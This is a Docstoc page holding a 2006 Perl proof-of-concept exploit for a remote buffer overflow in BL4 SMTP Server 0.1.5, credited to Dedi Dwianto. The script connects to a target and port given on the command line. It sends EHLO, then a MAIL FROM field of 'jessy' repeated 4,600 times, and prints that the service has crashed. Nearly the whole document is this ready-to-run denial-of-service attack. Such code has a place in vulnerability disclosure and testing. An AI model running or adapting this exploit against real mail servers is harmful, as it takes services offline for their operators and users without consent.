Docstoc

BL4 SMTP Server 0.1.5 Remote Buffer Overflow PoC

Document Sample
BL4 SMTP Server 0.1.5 Remote Buffer Overflow PoC Powered By Docstoc
					                                 BL4 SMTP Server 0.1.5 Remote Buffer Overflow PoC                                                           Page 1/1
  1    #!/usr/bin/perl
  2
  3    use IO::Socket;
  4    use Socket;
  5
  6    my($socket) = "";
  7
  8
  9    if($#ARGV < 1 | $#ARGV > 2) {usage()}
  10
  11   if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
  12   $adr = $ARGV[0];
  13   $prt = $ARGV[1];
  14
  15   $socket = IO::Socket::INET−>new(Proto=>"tcp", PeerAddr=>$adr,
  16   PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";
  17
  18
  19            print " −− Connecting To SMTP server at $adr port $prt ... \n";
  20
  21            sleep(1);
  22
  23            print $socket "EHLO yahoo.com\r\n" and print " −− Sending Request to $adr .....\n" or die "Error : can’t send Request\n";
  24
  25            sleep(1);
  26
  27            print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " −− Sending Buffer to $adr .....\n";
  28
  29            sleep(1);
  30            printf("[+]Ok!\n");
  31            printf("[+]Crash service.....\n");
  32            printf("[~]Done.\n");
  33
  34            close($socket);
  35
  36
  37   sub usage()
  38    {
  39    print "\n=========================================\r\n";
  40    print " BL4’s SMTP server Remote DOS \r\n";
  41    print "=========================================\r\n";
  42    print "    Bug Found by Dedi Dwianto \r\n";
  43    print " www.echo.or.id #e−c−h−o irc.dal.net \r\n";
  44    print "    Echo Security Research Group \r\n";
  45    print "=========================================\r\n";
  46    print " Usage: perl bl4−explo.pl [target] [port] \r\n\n";
  47    exit();
  48    }
  49
  50   # milw0rm.com [2006−04−27]


Dedi Dwianto                                                                                                                                04/27/2006

				
DOCUMENT INFO